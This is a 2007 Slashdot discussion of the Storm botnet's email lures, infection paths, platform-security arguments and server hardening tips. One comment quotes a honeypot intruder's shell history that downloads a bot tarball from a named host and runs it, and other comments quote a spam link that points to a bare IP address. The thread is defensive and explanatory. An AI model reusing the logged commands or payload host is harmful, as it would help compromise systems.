
Storm Botnet Is Behind Two New Attacks

Posted by kdawson
from the do-not-click-here dept.
We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

  • by Jennifer York (1021509) on Sunday August 26, 2007 @11:59AM (#20363023) Homepage
    I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did show us that we need to upgrade our infrastructure.

    I fscking hate SPAM!

    • I definitely started to get these "face is all over 'net" SPAMs at about that point in time...I've been getting a few per day since.
    • This Slashdot entry, itself, appears to be spam. Neither link provides any information that anyone who's gotten one of these mails didn't already know.

      Neither blog provides proof, forensic details, or anything even remotely interesting to a geek seeking out "news for nerds." Just the bare necessary to make it look like it's a well-meaning tech link and not a scheme to inflate someone's page views.

      All they are is a couple of paragraphs saying, "Hey, you know all those new spam messages you're getting? The
      • On the contrary. This is another article for me to print for the PHB, telling him why I have had so much time over the last month.

        It is also a peer bonding thing, like "It burns when I pee." "Hey, it burns when I pee as well!"
    • Considering that the post contains a link to a page that has a link to the trojan, I think we can all expect the trojan to be even more prevalent by Monday. Not sure who to be more upset with at this point: the people that wrote it, John Pospisil for posting a live link to the infected page (seriously, remove the href already), or kdawson for linking to Pospisil.
    • It may behoove you to invest in some services from Postini rather than spend money on more infrastructure. They handle such massive spam mail volumes with relative ease and their customer support is top-notch when a rare spam happens to slip through.
  • Skynet... (Score:3, Funny)

    by Colin Smith (2679) on Sunday August 26, 2007 @12:00PM (#20363041)
    It's looking for more processing power...

    http://www.emhsoft.com/singularity/ [emhsoft.com]

    YKIMS!

     
    • Imagine if they put this botnet to a real use, like Seti@Home. They'd be uber-points people in no time.

      But noooo, they have to be all evilly criminal types, don't they.

      • by bmo (77928)
        "Imagine if they put this botnet to a real use, like Seti@Home."

        I thought about doing this for folding@home (cure cancer with a virus!), but once you get mondo points, someone's going to ask if you have _legitimate_ access to all those computers. Vijay likes to keep everything above board.

        As for seti@home, I'd run it if it wasn't for the idea that I have that as communication gets more advanced, the less there is reliance on sending analogue electromagnetic waves hither and yon through the aether. SETI
        • The term Analogue or Digital is not so relevant. There is a visible energy lobe for just about every transmission type, even spread spectrum is obvious and usually well above the noise floor on just about any low end spec/an. TV might fully go the way of copper or fiber, but there are still millions upon millions of other uses for radio. Look how widespread WiFi has become in just a few short years. You only need a few milliwatts of power on the right frequency to be picked up by satellite. RADAR pumping o
          • by Torvaun (1040898)
            The problem isn't detection, it's interpretation. Let's say that someone intercepts some of our traffic. This isn't hard to imagine at all. But it gets considerably more complicated once you start accounting for Doppler and interference, especially if you want to send any sort of meaningful data. Now, you have a massive chunk of encoded data that they have never seen before. It would be like going up to average Joe with the puzzle out of the back of an issue of 2600, and asking him what it says. There'
  • I'm curious just how this works - what does a recipient of this email need to do to get infected?

    First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

    Now, I'd assume no one will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on th
    • Re: (Score:2, Informative)

      Generally, you click the link and it takes you to a page that will try one of many (mostly patched) javascript exploits to install malware on your system. I reverse engineered a few of these pages last week and, while they weren't amazingly clever, it is interesting.

      If that doesn't work, they usually bring up a page saying something like 'If you are seeing this message, please download our secure login software', along with a link.

      I'm surprised they even try something as obvious as this, but I assume that
    • by garcia (6573)
      First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

      Neither SpamAssassin nor GMail's mail filters are nabbing a lot of this stuff at first. I've marked about 15 of them as spam on my website's GMail account and yet similar messages are *still* getting through. I can certainly understand how people are being infected in the first
    • by pe1chl (90186) on Sunday August 26, 2007 @12:41PM (#20363405)
      Yes. But remember, the mail message pretends to be something like an e-card from a friend. You have to click on the link to see the e-card.
      Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
      The next page explains they have to load some software. Not too unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
      Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?

      So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.

      So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
      Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).
      • by Tom (822) on Sunday August 26, 2007 @01:09PM (#20363599) Homepage Journal

        Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
        Exactly. That's as if you had sensors in your clothes to ring a bell every time someone touches you, because he might be a pickpocket. I guarantee you that after one day in the city, you'll turn it off. Or if you can't do that, start to ignore it. Boom, suddenly you are an easier target than you would be without the "alarm system". You got desensitised.

        Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypticThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonsenseyouhearonstartreck - do you now want to disallow it not doing it?"
    • Because the latest one has a message like "I can't believe it is you" or "Look at the drunk chick" and a youtube link. Only by hovering over it, and looking at the bottom of the window, do you see it become an IP address with no other stuff. And after trying for 10 years, I have yet to teach my mother how to do this, why it is important, or what it means. It is actually one of the most clever wetware hacks I have seen in years. Too bad it works so well.
  • Arggg! (Score:4, Insightful)

    by JamesRose (1062530) on Sunday August 26, 2007 @12:30PM (#20363285)
    I hate these comments "Damn Microsoft and their inferior security". That's BS, the reason Windows gets hacked is because there are so many more MS machines than any other type of machine. Botnets are there to make money; the more machines they infect, the more spam they produce, the more money they make. If you want to infect machines, you go for Windows because it has by far the most market share, so it returns the biggest profit. So all the people hacking machines aim at Windows, and multi-million dollar businesses are solely aimed at hacking Windows. If any other operating system had that much focus given to it, it would collapse in days, so stop with all the shit about MS having bad security; they do quite a good job in the absolute worst circumstances and as a result only the stupid users get infections.

    ~Not AC cause I don't value my karma~
    • Re:Arggg! (Score:5, Insightful)

      by DaleGlass (1068434) on Sunday August 26, 2007 @12:37PM (#20363367) Homepage
      Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

      Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
      • by grommit (97148)

        Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3?

        I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

        • I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.

          A good deal of which have ISPs that block outgoing connections on port 25, which isn't a problem for servers.
      • by Sancho (17056)

        Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.

        Servers are going to be more highly scrutinized. Where I work, we have multiple IDS watching the network, and bandwidth monitors that watch for spikes. If a host started using up any significant amount of our bandwidth, we'd know, and we'd shut it down. Not so for most home computers. Bot infections can last for years on home computers when the user doesn't know that there's something wrong, or that they need to fix something.

        Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)

        Linux is a kernel. A distribution of Linux could easily have open ports, an

      • Re: (Score:2, Informative)

        by kayditty (641006)
        It's just a matter of philosophy. I used to be a "cracker" and a "DoS kid" on EFNet. I didn't use Windows machines (I also didn't need/use "DDoS" networks*). Most everyone on EFNet used Linux/UNIX machines with high bandwidth connections. Now, Windows nodes with cable modems seem to be a lot more popular. I think the kids on EFNet know a little bit about what they're doing, since I was one of them (but I was never as stupid as most of them seem to be). A few of them went on to become security experts, last
    • the reason Windows gets hacked is because there are so many more MS machines than any other type of machine.

      If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?

      Windows is inherently less secure than most of the competition in a number of ways.

      1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
      1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
      2. Windows requires a number of insecure services to run to perform routine operations.
      2a. There is no way to force these services to be run local-only without using a firewall.
      2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
      3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
      3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.

      The idea that any one of these three issues and their consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I cannot conceive of the confusion in the mind that would lead to such a conclusion.
      • Re: (Score:3, Informative)

        by Anonymous Coward
        IIS 6 has never had a remote root, and it's four years old.
        • Re: (Score:3, Insightful)

          by argent (18001)
          1. The point is that popularity is not the only or even the primary reason why a product can be attacked.
          1a. Back in the old "classic" Mac era the Mac went through a period where it was the prime target for attacks, despite it having a fraction of the market, simply because it had such a huge surface area to attack.
          1b. Apple responded to many exploits (for example, in autorun CDs and floppies) by removing dangerous capabilities.
          1c. Similarly, UNIX systems usually don't come with the "r" suite enabled or oft
    • Homework assignment:

      Do some research and read about when Microsoft first started talking about ActiveX and the response of the industry at that time.

      Hint: The response was unfavorable and mainly for security reasons.

      Extra Credit: Name three Windows exploits that required no user interaction to be successful that existed within the last 5 years.
  • Unless you've got GFI or Symantec Mail Security, I'd suggest setting up IMF. It's a free spam filter included in Exchange 2003 SP2. Below is a link to get you started.

    http://www.petri.co.il/block_spam_with_exchange2003_imf.htm [petri.co.il]

    Obviously it doesn't prevent the spreading of SPAM, but it doesn't mean you have to live with the incoming onslaught.
  • Interesting Question (Score:3, Interesting)

    by spikedvodka (188722) on Sunday August 26, 2007 @12:56PM (#20363511)
    This whole scenario brings up a rather interesting question: Is this a Spam problem, or a virus problem?

    From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A spam filtering company could well "pass the buck" and say that this is a virus problem: yes, it's going to trigger on some spam rules, but "where it's a virus problem, why create special rules for it?"

    I can see this type of attack becoming more popular in the future, at least until this question is solved.
  • ... of all mankind. A distributed computing project for the benefit of the human race. Like, cracking blu-ray DRM or something.
  • by nick13245 (681899) on Sunday August 26, 2007 @01:16PM (#20363663)
    For instance, here's a recent attack to my honeypot (Running Slackware Linux)

    root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
    root@zomg:~# cat /home/webmaster/.bash_history
    ssh localhost
    w
    cat /etc/hosts
    cat /proc/cpuinfo
    passwd
    cd /var/tmp
    ks
    l
    sl
    ls
    ls- all
    ls -all
    mkdir " "
    cd " "
    clear
    wget imaginez0r.xhost.ro/botme.tar.gz
    tar zxvf botme.tar.gz
    rm -rf botme.tar.gz
    cd .bot/
    PATH=.:$PATH
    bash

    These kinds of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.

    • Re: (Score:3, Interesting)

      by MarkRose (820682)
      Interestingly enough, imaginez0r.xhost.ro/botme.tar.gz is still available for download. Looks like the bot is controlled by IRC.
      • by inKubus (199753) on Sunday August 26, 2007 @11:08PM (#20368085) Homepage Journal
        Yeah, that link is just to an eggdrop-based bot. It connects to the irc channel and probably lets the next layer of the botnet know it's alive. This is one of many tools they use to fully exploit an open box. The bot probably has the ability to remotely run commands. That script in the GP looked a lot like a human was doing the typing though, due to spelling errors, etc.

        As far as xhost goes, you can get a free account [xhost.ro] too :). Storm is pretty scary, and there's bad people out there wanting to use your computing resources illegally.

        Make sure you run logwatch and logrotate and md5 the logs when they rotate (and rotate frequently, like every minute). Then store the checksum somewhere innocent after rotating. Have logwatch automatically check the checksums on all existing logs and report on that also. hosts.deny everything but your own personal IP address (in hosts.allow) on all ports except those you need to do business. SSH ONLY, don't use telnet or other unencrypted connections. Don't allow root to connect from SSH. Don't allow su from ssh (if possible). Compile your own stuff (including your compiler), never run binaries. Use shadow passwords. Put all of your binaries on a read-only mounted partition, with /var /tmp on a read/write (this is pretty good to do if you have a stable setup, such as a web server). If you can't do that, break your services into virtualized boxes using Xen or VMware or something so you can quickly recover from a saved image if something does happen. Regularly nmap, nessus and satan your box for holes. Put a passive hardware sniffer between your box and the 'net to look for suspicious packets. Etc.

        Most of this is duh stuff and easy to do, and you should have it written in your procedures for building a new box. I believe the NSA has some guidelines also.
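The "md5 the logs when they rotate and store the checksum somewhere innocent" step from the checklist above, written out as an added Python example (not code from the poster or from any of the tools named). It substitutes SHA-256 for MD5, and the log file names, hostname and entries in the demo are constructed.

```python
"""Checksum manifest for rotated logs: build it at rotation time, verify it later."""
import hashlib
import json
import os
import tempfile


def file_digest(path):
    """SHA-256 of a file, read in chunks so large logs need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(log_dir):
    """Map every regular file under log_dir (path relative to it) to its digest."""
    manifest = {}
    for root, _dirs, files in os.walk(log_dir):
        for name in files:
            full = os.path.join(root, name)
            manifest[os.path.relpath(full, log_dir)] = file_digest(full)
    return manifest


def save_manifest(manifest, manifest_path):
    """Write the manifest as JSON. Copy it off the host afterwards, so that a
    root compromise cannot rewrite both the logs and the record of their sums."""
    with open(manifest_path, "w") as f:
        json.dump(manifest, f, indent=2, sort_keys=True)


def load_manifest(manifest_path):
    with open(manifest_path) as f:
        return json.load(f)


def verify_manifest(log_dir, manifest):
    """Compare the directory's current state with a stored manifest.

    Returns sorted lists of files whose content changed, files that vanished,
    and files that appeared since the manifest was taken. A closed, rotated
    log has no legitimate reason to show up as modified.
    """
    current = build_manifest(log_dir)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in current),
        "new": sorted(p for p in current if p not in manifest),
    }


def demo_manifest_roundtrip():
    """Constructed scenario: two rotated logs, then one edited, one deleted, one added.

    Returns (report_before_tampering, report_after_tampering).
    """
    with tempfile.TemporaryDirectory() as logs, tempfile.TemporaryDirectory() as safe:
        # Constructed sample log lines; "zomg" mirrors the honeypot hostname in the thread.
        with open(os.path.join(logs, "auth.log.1"), "w") as f:
            f.write("Aug 26 12:00:01 zomg sshd[1234]: Accepted publickey for webmaster\n")
        with open(os.path.join(logs, "messages.1"), "w") as f:
            f.write("Aug 26 12:00:02 zomg logrotate: rotated auth.log\n")
        manifest_path = os.path.join(safe, "logs.manifest.json")  # the "somewhere innocent"
        save_manifest(build_manifest(logs), manifest_path)
        stored = load_manifest(manifest_path)
        clean = verify_manifest(logs, stored)
        # Simulate the traces an intruder's clean-up would leave behind.
        with open(os.path.join(logs, "auth.log.1"), "w") as f:
            f.write("\n")                                # entries scrubbed
        os.remove(os.path.join(logs, "messages.1"))     # file deleted outright
        with open(os.path.join(logs, "cron.1"), "w") as f:
            f.write("planted\n")                         # unexpected new file
        return clean, verify_manifest(logs, stored)


if __name__ == "__main__":
    before, after = demo_manifest_roundtrip()
    print("before tampering:", before)
    print("after tampering: ", after)
```

Run it from cron right after logrotate and alert on any non-empty list in the report.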
  • social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video.

    I don't normally get much spam - maybe one every other week, but I've gotten two of those lately

    OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 [youtube.com] (link goes to http://90.31.69.105/ [90.31.69.105])

    and

    LMAO, I cant believe you put this video online.
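The hover check described earlier in the thread (the visible YouTube link actually pointing at a bare IP), applied to mail like the two samples quoted above, as an added Python example that is not part of the original thread. The HTML body, the watch id and the 192.0.2.10 address are constructed.

```python
"""Flag e-mail links whose visible text points one place and whose href points another."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample body in the style of the spam quoted in the thread.
SAMPLE_HTML = """
<p>OMG, what are you doing man. This video of you is all over the net. go look at it...
<a href="http://192.0.2.10/">http://www.youtube.com/watch?v=EXAMPLE01</a></p>
<p>A legitimate link for comparison:
<a href="http://www.youtube.com/watch?v=EXAMPLE01">http://www.youtube.com/watch?v=EXAMPLE01</a></p>
"""


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from every <a> element."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host_of(url):
    """Lowercase hostname of a URL (scheme optional), or None if it has none."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    return (parts.hostname or "").lower() or None


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_mismatched_links(html):
    """Return one finding per suspicious anchor in an HTML mail body.

    An anchor is flagged when its href host is a bare IP address, or when the
    visible text looks like a URL whose host differs from the href host.
    """
    collector = _AnchorCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.anchors:
        target = _host_of(href)
        looks_like_url = "://" in text or text.startswith("www.")
        shown = _host_of(text) if looks_like_url else None
        reasons = []
        if target and _is_ip_literal(target):
            reasons.append("href host is a bare IP address")
        if shown and target and shown != target:
            reasons.append(f"visible text says {shown} but href goes to {target}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_mismatched_links(SAMPLE_HTML):
        print(finding)
```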
  • by quokkapox (847798) <quokkapox@gmail.com> on Sunday August 26, 2007 @01:29PM (#20363783)

    You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).

    These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.

    But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.

    People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.

    All you have to do is click on one really bad link. Sometimes, not even that.

    This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.

    • by MrMr (219533) on Sunday August 26, 2007 @03:07PM (#20364625)
      On the planet where I live, people are obliged to take practical and theoretical exams, to buy insurance for damage they may cause to others, and still the streets are full of armed government officials to make sure none of the hundreds of detailed rules are broken. This is considered a sane precaution to reduce road traffic accidents.
      Extrapolating that I'm guessing that in a couple of decades the "I don't know what my computer does, so it's not my problem" defense is going to be as acceptable as "of course I ran over your daughter, I cannot drive a car at all".
    • by Kjella (173770)
      You talk as if this is an unsolved problem. There's a range of solutions that could be used from using two-factor authentication, a non-networked computer, a "no-play" locked down computer where you don't block everything in firewall and don't install anything funny or even surf around, a webTV like device sold by online banks or any other number of variations. People don't want it, they want to do everything on their general purpose machine, which tells me it doesn't happen often enough or doesn't hurt eno
    • by thogard (43403)
      Many of the safety features you mention are there because of UL. UL is a lab set up by insurance companies to encourage safer products to save the insurance company money.

      I wonder what will happen if a bunch of insurance companies all got hit with suits going after home owner liability insurance payoffs. Would the insurance companies then go after MS or would they just force all insured home owners to run the latest version of their favorite corp's bad anti-virus code?
  • After all this time and all these spams, isn't it fairly reasonable to assume that nearly everyone who is going to get their box owned by the trojan already has?

  • by Nom du Keyboard (633989) on Sunday August 26, 2007 @02:09PM (#20364093)
    Does Storm only attack Windows? Likely yes, I'm sure. Shouldn't Microsoft be attacking this one specifically with their malicious software scanner that's part of every Windows Update?
  • Maybe it's just coincidence, but I've been bombarded with the e-card things for a while now, and the youtube thing for a couple of days or so. Since this story broke on Slashdot, I just checked the spam trap and I haven't had a single one for the last 12 hours or so...
  • Form a team of investigative experts. Find all the machines in a botnet and ask their ISP to disconnect them. If an ISP refuses to cooperate, get their upstream provider involved and start threatening disconnection for all users. They'll soon fall into line.

    Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.
    • I do. We run the WiFi for several hotels. The storm worm traffic is easy to spot. We block them. They call support. A PFY says, "Oh, you're 'DELL53476' and you have the storm worm." Then we tell them the closest Fry's or Best Buy. It ain't much, but I stopped 6!
  • Let's call it "Tabula Rasa" day, or since that name is the name of an upcoming game, let's just call it "Global Reformat Day". Everyone in the world reformats their computer on that day.

    Storm what? Yea, that's right, fuck you Storm, we just reformatted every computer connected to the internet today.

    Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.
    • Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.

      The obvious solution is to just direct the botnets to recognize the first Reformat Day automatically.
